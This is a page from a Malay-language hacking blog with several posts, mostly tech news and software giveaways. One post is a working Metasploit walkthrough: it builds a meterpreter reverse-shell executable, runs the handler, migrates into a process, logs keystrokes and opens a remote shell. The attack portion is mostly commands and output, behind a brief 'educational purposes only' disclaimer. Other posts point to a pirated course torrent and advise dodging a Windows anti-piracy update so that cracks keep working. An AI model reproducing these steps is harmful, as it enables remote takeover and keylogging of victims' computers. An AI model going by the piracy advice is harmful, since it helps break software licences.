Utama Blog Laman 282

Blogger New Interface 2012

0

Blogger akan menaik taraf platform blogging mereka pada bulan April secara rasmi. Namun, mereka yang tidak sabar lagi untuk mencuba bolehlah menaik tarafnya apabila keluar satu tetingkap kecil yang menyuruh berbuat demikian. Berikut adalah beberapa paparan skrin paparan antaramuka baharu blogger:

Klik gambar untuk paparan lebih jelas

Blogger sudah pun menjadikan platform bloggingnya lebih menarik untuk digunakan dan lebih intuitif serta produktif (Huh..ayat..). Apapun, harapannya agar pada masa akan datang, blogger tidak lagi dipandang sebagai ‘anak tiri’ dalam Google dengan penaiktarafan ini.

Views: 2

Iklan Newspaper Inline

[Giveaway]Ashampoo Photo Commander 9 Free License Key

0

Assalamualaikum,kepada warga-warga OMG!!Hackers..

Hari ini merupakan hari yang sangat indah bagi kita..Ashampoo Photo Commander 9 telah menawar lesen Full Version..WOW!!..
Ashampoo Photo Commander 9  menawarkan ciri-ciri yang sempurna untuk mengedit dan mengoptimumkan gambar digital anda…

Ashampoo telah mengeluarkan Versi 9 dengan banyak ciri-ciri baru dan penambah baikan… Fungsi baru ini memberikan gambaran yang lebih baik dalam pengurusan foto…Beberapa alat penyuntingan baru dan fungsi yang kesan untuk gambar dan video serta peningkatan luas untuk membuat penyuntingan, pengoptimuman dan organisasi gambar digital anda,serta pengendalian fail video dan audio lebih mudah…

                                                                  Screenshot

Cantikan..Comey kucing tu..

Sistem operasi:
-Operating System:Windows® XP, Windows Vista®; Windows® 7, For users of Windows® XP we recommend Service Pack 2 or later…
-RAM and disk space: Min. 256 MB RAM, Hard Disk Space 160 MB..

Giveaway:
-Ikot Step yang diberi..
1.Anda perlu download dahulu untuk mendapatkan lesen nya..Pergi ke sini untuk download http://giveaway.downloadcrew.com/offer/ashampoo_photo_commander/27284
2.Anda install macam biasa,selepas itu anda klik pada “Buy now Ashampoo Photo Commander 9”..

3.Anda akan ke laman promosi untuk mendapatkan lesen nya..jika anda belum register di laman tersebut,register dahulu untuk mendapatkan lesen nya..https://www.ashampoo.com/en/usd/mlo/intro

4.Jika sudah register,anda pergi laman promosi di sini..

5.Anda akan menerima lesen dengan percuma..

Giveaway ini akan tamat dalam masa 20 jam dari sekarang..ada banyak masa lagi untuk sedut banyak-banyak..
Credit to:Ika Yusof..

Views: 3

Iklan Newspaper Inline

Cut The Rope : Mainkan Ia Di Pelayar Web Anda

0

Cut The Rope ialah salah satu permainan yang telah mendominasi telefon pintar seperti iPhone dan juga Android. Terdapat versi flash untuk PC dan ia merupakan klon kepada permainan ini iaitu Feed The Panda (Malangnya Mr.Hac tak jumpa pula pautan untuk muat turun. Sesiapa yang ada jumpa kongsikan di ruangan komen).

Microsoft dengan kerjasama ZeptoLab dan Pixel Lab kini telah mencipta versi HTML5 untuk permainan ini, dan ia bererti kebanyakan pelayar web moden boleh memainkannya. Permainan popular ini mempunyai 27 tahap (level) dan boleh dimainkan tanpa menggunakan plugin Flash.

Habis jugak akhirnya!
Untuk pengetahuan anda, terdapat 7 tahap yang eksklusif, hanya untuk pengguna Internet Eksplorer 9 sahaja. Ia hanya boleh dibuka (Unlocked) apabila permainan ini di-pin ke taskbar. Jadi buat mereka yang sudah menggunakan Windows 7 dan IE9, anda memang golongan yang ‘bertuah’ kerana dapat memainkan tahap eksklusif tersebut.

Bagi mereka yang mahu mencuba, silakan buka pautan http://www.cuttherope.ie/

Views: 3

Iklan Newspaper Inline

Tutorial Metasploit Menggunakan Backtrack

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Metasploit adalah sumber terbuka rangka kerja(framework) untuk ujian penetrasi. Ianya digunakan untuk mengembangkan dan melaksanakan serangan terhadap sistem sasaran. Ia juga mempunyai pangkalan data yang besar dan boleh juga digunakan utnuk menulis eksploitasi zero-day kita sendiri.

Di bawah ini saya senaraikan basic-basic term yang perlu anda tahu:

  • Vulnerability: Kecacatan atau kelemahan dalam prosedur sekuriti sistem, reka bentuk atau pelaksanaan yang boleh dieksploitasikan sehingga menyebabkan kerosakkan.
  • Exploit: Sejenis perisian yang mengambil kesempatan terhadap bug atau vulnerability, yang boleh membawa kepada privilege escalation atau serangan DOS terhadap sasaran.
  • Overflow: Ralat yang disebabkan apabila sesuatu program itu cuba untuk menyimpan data di luar saiznya. Mungkin ianya digunakan untuk membolehkan penyerang untuk melaksanakan malicious code.
  • Payload: Kod sebenar yang dijalankan pada sistem yang dikompromi selepas eksploitasi.

Metasploit muncul dengan versi-versi berikut:

  • CLI (Command Line Interface)
  • Web Interface
  • MSF Console
  • MSFwx
  • MSFAPI

Untuk tutorial hari ini saya menggunakan MSF console kerana ianya mudah dan efektif. Jadi apa yang anda perlukan adalah Backtrack dan 2 komputer, iaitu satu tu untuk komputer anda dan satu lagi komputer sasaran. Ingat! Anda lakukan ini di network anda sendiri. Okay. Are you ready? Lets GO!

Mula-mula sekali buka backtrack anda itu. Kalau tak tahu nak pasang anda boleh godek-godek blog ni untuk cari cara pemasangannya. Apa yang penting sekali anda perlu tahu Local IP anda. Anda buka terminal dan taipkan

root@bt:~#ifconfig

Kemudian anda akan jumpa IP anda seperti 192.168.x.x atau 10.x.x.x

Pastikan anda ingat IP anda itu.

Langkah seterusnya anda pergi ke Applications >> Backtrack >> Exploitation Tools >> Network Exploitation Tools >> Metasploit Framework >> msfconsole

Anda pasti akan mendapat shell yang sama seperti command prompt di dalam Windows.

Selepas itu anda membuka terminal dan taipkan perintah ini. Tujuannya untuk mencipta satu fail pelaksanaan yang membolehkan menghubungkan komputer kita dan komputer sasaran dengan menggunakan meterprete payload.

root@bt:~# cd /opt/framework3/msf3

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”Local IP Anda” LPORT=”Apa-apa sahaja Port” x > /root/Desktop/reverse_tcp.exe

Local IP anda itu adalah IP anda sendiri. Yang saya suruh ingat tadi. Kalau lupa tengok balik kat atas. Dan untuk port anda boleh pilih 4444. (Semua ini ditulis tanpa quotes.)

Anda akan mendapat seperti ini:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/framework3/msf3#

Juga di desktop anda akan ada fail reverse_tcp.exe.

Anda salin reverse_tcp.exe itu dan tampalkannya pada komputer sasaran anda yang menggunakan local network yang sama. Kemudian jalankannya.

Kemudian anda buka semula msfconsole yang saya suruh buka tadi itu. Dan taipkan ini

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

Baiklah semua sudah siap. Anda telah pun membuat fail pelaksanaan yang mana ianya akan balik semula connections itu kepada anda.

Langkah terakhir adalah taipkan “exploit” dan tekan enter.

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

Anda akan melihat meterpreter prompt seperti ni

meterpreter >

Taipkan “ps” untuk mendapatkan senarai proses yang aktif

meterpreter > ps

Kemudian cari perkataan “explorer.exe” dan pindahkannya ke proses. Anda perlu lihat pada nombor di sebelah explorer.exe. Sebagai contoh nombornya adalah 5716. Taipkan “migrate 5716”

meterpreter > migrate 5716

[*] Migrating to 5716…

[*] Migration completed successfully.

Kemudian taipkan perintah ini pula

meterpreter > use priv

Jika anda mahu mulakan aktiviti keylogger, anda boleh taipkan ini

meterpreter > keyscan_start

Jika anda ingin pergi ke komputer sasaran anda itu. Anda boleh taipkan ini

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:Windowssystem32>

Anda boleh buat apa saja bila sudah masuk ke komputer sasaran. Dan jika nak kemabali ke meterpreter, anda taipkan perintah ini

C:Windowssystem32> exit

Jika anda ingin melihat apa yang telah di taip pada komputer sasaran, anda taipkan ini

meterpreter > keyscan_dump

Sudah siap! Itu sahaja tutorial yang dapat saya ajar. Kalau anda ada tersalah langkah, ianya tidak akan menjadi. Saya telah mencubanya dua kali dan ianya memang menjadi. HAHA. Jadi apa tunggu lagi? Godam la komputer anda sendiri. 😛

P.S.: The above information is just for educational purposes only. You should test it against the computer you own. Kalau nak bertanya, jangan la tanya soalan-soalan yang tidak munasabah. Anda perlu buat dahulu, cuba buat sendiri. Jangan sebelum buat, dah tanya macam-macam. Itu tandanya anda MALAS.

Rujukan : Metasploit Tutorial With Example

Sekian.

Views: 2

Iklan Newspaper Inline

Android 5.0 : Jelly Bean

0

Ice Cream Sandwich : Selain daripada kecanggihan reka bentuknya yang menawan dengan ikon dan antaramuka diperbaharui, ia juga didatangkan dengan pelbagai fungsi dan pelbagai penaiktarafan untuk melakukan tugas berbagai (Multitasking).

Desas-desus mengatakan, setelah anda sudah puas menjamah Ice Cream Sandwich (ICS) dan jari anda sudah pun melekit dengan kepelbagaian perisanya, selepas ini anda bakal menikmati pula perisa baharu untuk sistem operasi Android ini iaitu Android 5.0 Jelly Bean.

ICS ialah gabungan ciri-ciri penyesuaian terpilih Honeycomb dan Gingerbread, dilancarkan pada peranti pertamanya Samsung Galaxy Nexus (Google Nexus Prime) baru-baru ini. Tetapi semasa kebanyakan peranti mula beralih arah kepada ICS, timbul desas-desus mengatakan bahawa Android 5.0 akan dirilis dengan kod nama Jelly Bean.

Asal nama Jelly Bean dikatakan setelah melihat tradisi ‘susunan abjad’ serta faktor nama pencuci mulut yang sering digunakan dan sinonim dengan Android. Antara contoh yang boleh kita lihat, seperti C (Cupcake), D (Donut), E (Eclair), F (Froyo), G (Gingerbread), H (Honeycomb), serta I (Ice Cream Sandwich). Disebabkan itulah Jelly Bean dipilih sebagai kod nama seterusnya untuk meneruskan kesinambungan atau tradisi pemberian nama sistem operasi Android ini.

Ciri-ciri baru yang diperkatakan ialah pelayar web yang lebih pantas, pengurus fail (File Manager), papan kekunci terbina, integrasi servis Google yang diperkemas, perlindungan Malware dan kesediaan Flash, serta serasi kedua-dua Smartphone dan Tablet.

SUMBER: Diolah dari Majalah PC Edisi 184 April 2012 (Sokonglah Majalah IT Tempatan).

Mr.Hac: Ruangan ‘Hubungi Admin telah pun dikemaskini dan boleh diakses. Terima kasih kepada yang menggunakannya.

Views: 3

Iklan Newspaper Inline

Certified Ethical Hacker Version 7

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Baiklah anda mesti sudah tahu mengenai Certified Ethical Hacker ini betul tak? Bagi yang tidak tahu, Certified Ethical Hacker ini adalah pengiktirafan profesional yang diberikan oleh International Council of E-Commerce Consultants (EC-Council) kepada mereka yang layak menerimanya.

Ethical Hacker ini atau dalam bahasa melayunya penggodam beretika, selalunya mereka ini orang yang boleh dipercayai yang di lantik dalam sesebuah organisasi untuk menguji keselamatan jaringan(network) atau/dan sistem komputer dengan menggunakan cara yang penggodam lakukan. Tujuannya untuk mencari dan membaiki ruang sekuriti komputer tersebut.

Kursus untuk versi 7 ini mempunyai 19 modul, iaitu:

  1. Introduction to Ethical Hacking
  2. Footprinting and Reconnaissance
  3. Scanning Networks
  4. Enumeration
  5. System Hacking
  6. Trojans and Backdoors
  7. Viruses and Worms
  8. Sniffers
  9. Social Engineering
  10. Denial of Service
  11. Session Hijacking
  12. Hacking Webservers
  13. Hacking Web Applications
  14. SQL Injection
  15. Hacking Wireless Networks
  16. Evading IDS, Firewalls, and Honeypots
  17. Buffer Overflow
  18. Cryptography
  19. Penetration Testing

Anda mesti mahukan modul kursus ini betul tak? Boleh saja. Setelah saya mencari, akhirnya saya terjumpa satu fail yang lengkap dengan kursus dan alat-alatnya sekali. Ianya bersaiz 16GB! Menarik tak? Belum cukup menarik lagi. Heeee. Di dalam fail tersebut juga disertakan video untuk setiap tajuk modul kursus tersebut. Wow! Jadi apa pautannya? Sabar-sabar. Pautannya ialah di Lanunbay.org.

Ianya adalah torrent jadi kepada sesiapa yang malas sangat nak menggunakan torrent ini dan ingin memuat turunnya secara terus anda boleh salin pautan ini dan pergi ke laman zbig.com dan tampalkan pautan yang telah anda salin tadi pada ruang yang di sediakan. Tetapi ianya hanya boleh di muat turun jika anda memiliki akaun premium, kerana hanya 8GB sahaja had yang dibenarkan untuk memuat turun bagi akaun percuma. Jadi nak tak nak kena guna torrent juga la. Itu sahaja yang dapat saya bantu anda. Selamat memuat turun dan di harap anda dapat menjadi penggodam yang beretika selepas ini. Hidup Penggodam Malaysia!

Update download link: Anda boleh mencarinya di Hotfile.

Sekian.

Views: 2

Iklan Newspaper Inline

“KB971033” Si Pahlawan Windows Penentang Lanun

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Microsoft telah melepaskan kemas kini Windows 7 yang terbina dalamnya sistem pengaktifan dan pengesahan(Windows Activation Technologies) sebagai langkah dalam memerangi lanun cetak rompak ni. HAHA. Kemas kini ini akan di hantar melalui Windows Update, dengan namanya “Update Micorosft Windows (KB971033)” pada akhir februari lepas. KB971033 ini boleh di muat turun secara berasingan di Microsoft Download Center dan boleh dapatkannya secara talian di www.microsoft.com/genuine.

Berdasarkan Genuine Windows Blog, Windows Activation Technologies Update untuk Windows 7 ini boleh mengesan lebih dari 70 activation cracks yang berpontensi berbahaya atau eksploitasi. Eksploitasi pengaktifan(Activation Exploits) yang juga kadang-kadang dipanggil “hacks” boleh melepasi atau berkrompomi dengan Windows Activation Technologies.

Setelah kemas kini itu dipasang, kemas kini itu akan melindungi pelanggan dengan mengenal pasti eksploitasi pengaktifan yang akan memberi kesan terhadap pengalaman PC mereka. Jika ekploitasi pengaktifan dijumpai, Windows akan memberi amaran pilihan kepada pelanggan dan menawarkan pilihan untuk menyelesaikan isu tersebut. Komputer yang menggunakan Windows 7 yang tulen tidak akan mendapat amaran eksploitasi pengaktifan tersebut. Jika menggunakan Windows 7 yang tidak tulen atau palsu, ianya akan mengeluarkan notifikasi yang menyatakan bahawa Windows tersebut tidak tulen dan memaparkan kotak dialog informasi dengan pilihan sama ada ingin mendapat lebih informasi mengenai Windows tersebut atau mendapatkan Windows yang tulen di laman rasminya. Desktop(paparan muka) akan beralih ke paparan muka yang biasa iaitu tiada latar belakang(warna hitam). Peringatan secara berkala dan watermark paparan muka akan berterusan mengeluarkan alert untuk mengingatkan pelanggan.

Walaubagaimanapun kemas kini ini boleh dinyahpasang. Ianya telah ditanda sebagai kemas kini penting(Important updates), jadi anda boleh memilih sama ada ingin memuat turunnya atau tidak. Baiklah pada pendapat saya bagi pengguna tegar Windows 7 tidak tulen, anda diingatkan jangan sesekali memuat turun dan memasangnya ke komputer atau laptop anda. Jika anda pasang, komputer anda yang telah di “crack” oleh aplikasi-aplikasi crack yang popular seperti Remove WAT,akan kembali menjadi tidak tulen semula dan ianya akan kekal begitu sampai bila-bila melainkan anda membeli kunci pengaktifannya di laman web rasmi Micorosoft. Kerana walaupun anda telah menyahpasang kemas kini tersebut, ianya tetap tidak akan dapat di pecahkan. Kenapa saya bercakap demikian? Sebab saya telah mencuba di laptop saya dan laptop saudara saya. Pada laptop saya, saya telah updatekan dengan kemas kini KB971033 dan beberapa update lain(kemudian nyahpasang(uninstalled) semula kemas kini KB971033 untuk tujuan crack), manakala laptop saudara saya pula adalah Windows 7 fresh installed iaitu Windows 7 yang baru saja di pasang tanpa sebarang update. Jadi saya telah menggunakan beberapa aplikasi untuk crack kedua-dua laptop tersebut dan ianya hanya berkesan pada laptop saudara saya.

Sebab itulah kalau boleh disablekan kemas kini anda supaya anda boleh memilih kemas kini yang sesuai untuk komputer anda. Jadi faham-faham je la bagi mereka yang telah menggunakan pelbagai aplikasi crack tetapi tetap tidak dapat tulenkan Windows itu, ini semua kerana anda telah memasang kemas kini KB971033! Haha. Saya simpati dengan anda. Hee.

Update Picture:

Sori gambarnya agak kabur sedikit.

Sekian.

Views: 2

Iklan Newspaper Inline

Pelayar Web OMG! Hackers? By Abg Saki

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Setelah seharian membuat pelayar web ini. Akhirnya siap juga. Nama pelayar web ini adalah OMG! Hackers?. Walaupun secara jujurnya ada banyak kelemahan tetapi itulah yang terbaik dapat saya lakukan buat masa ini. Tujuan saya cuma ingin berkongsi idea dengan anda mengenai visual basic ini. Di samping kita boleh buat aplikasi yang suka, ianya dapat membantu kita untuk memudahkan kerja kita. Bagi yang expert dalam visual basic harap dapat memberi teguran membina dan jangan hanya tahu nak kutuk saja. Hee.



Baiklah berbalik kepada aplikasi pelayar web yang saya buat ini. Fungsinya sedikit sahaja iaitu:

  • File Downloader – Boleh memuat turun fail tetapi anda perlu letakkan jenis fail itu seperti .exe , .txt dan sebagainya.
  • Glosari IT – glosari ini di buat berdasarkan entri Glosari Istilah IT Dalam Bahasa Melayu.
  • Calculator – Calculator biasa je la. Bukan scientific tau! Haha.
  • Social Network – Facebook,Myspace, Twitter, Google Plus+ dan banyak lagi.
  • Video – Youtube, PhotoBucket, Google Video dan banyak lagi.
  • Search – Google, Yahoo, Bing dan Aol.

Jangan mengharap yang lebih apabila menggunakannya. Guna hanya untuk suka-suka je. =)

Mahu belajar bagaimana membuatnya? Anda boleh lihat video di laman web Youtube. Banyak tutorial yang disediakan. Hehe.

Ini adalah pautan untuk memuat turunnya : Omghackers Browser-Abg Saki.exe

Warning! Use At Your Own Risk!

p/s: Ini hanyalah saja-saja. Bukan pelayar web official. Anggaplah ini projek main-main. 😛

Sekian.

Views: 0

Iklan Newspaper Inline

Securityoverride.net Laman Web Untuk Penggodam

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Securityoverride.net merupakan laman web yang menyediakan pelbagai info mengenai hacking dan cracking. Ianya sama seperti Hackthissite.org. Pengasas Securityoverride.net ini saya tidak pasti, tak silap saya CrashOverron. Disini anda boleh mengasah bakat anda dalam penggodaman ini dengan menyertai cabaran-cabaran yang disediakan. Anda hanya perlu mendaftar untuk menyertai cabaran tersebut. Semakin sukar cabarannya, semakin tinggilah mata yang anda dapat. Antara cabarannya adalah Reconnainssance, Basic, Javascript, Decryption, Privilege Escalation dan banyak lagi laa.

Ruang forum juga disediakan yang membolehkan anda bertanya tentang apa sahaja yang berkaitan dengan hacking dan cracking di situ. Mereka sedia membantu anda. Terdapat juga tutorial tentang hacking antaranya Sql Injection dan Cross Site Scripting. Jadi anda boleh mendapatkan pelbagai informasi di situ. Sebelum saya terlupa, Securityoverride.net ini juga menyediakan IRChat untuk ahlinya. Apa tunggu lagi? Sertailah sekarang!!

Di bawah ini adalah laman web Securityoverride.net

Di bawah ini adalah laman web Hackthissite.org. Kot-kot la anda nak cubanya sekali.

p/s: jika ada yang tidak tahu bagaimana untuk menggunakan IRChat, anda boleh melihatnya di entri ini.

Sekian.

Views: 3

Iklan Newspaper Inline

Koleksi E-Book Hacking Dan Cracking

0

Assalamu’alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

Hari ni saya cuma ingin berkongsi koleksi e-book, nota dan apa sajalah yang sama waktu dengannya berkaitan hacking dan cracking. Ini semua saya telah kumpulkan kerana minat yang mendalam terhadap hacking ini. Walaupun semuanya dalam bahsa inggeris, saya harap anda dapat menggunakannya dengan sebaiknya. Tetapi backtrack tu saya yang catat sendiri kat notepad. Hee. Orang noob la katakan. Terdapat beberapa buku yang popular seperti The Hackers Underground Handbook, Hacking Exposed dan sebagainya. Selain itu terdapat juga e-book yang berkaitan dengan sql injection, DDOS, Blind Sql Injection dan banyak lagi la. Tetapi kebanyakkannya berkaitan bagaimana untuk menjadi hacker la.

Untuk pengetahuan anda, e-book yang ditulis oleh Arya Putra aka Mr. Hac juga ada dalam tu, judulnya Anonymous Surfing Ciri Utama Penggodam. Tetapi saya punya versi lama la. Versi baru anda boleh dapatkannya di sini.

Ini adalah link untuk memuat turun fail rar tersebut. Saiznya adalah 62MB. Selamat memuat turun dan menuntut ilmu.

Abang Saki.rar

Sekian.

Views: 0

Iklan Newspaper Inline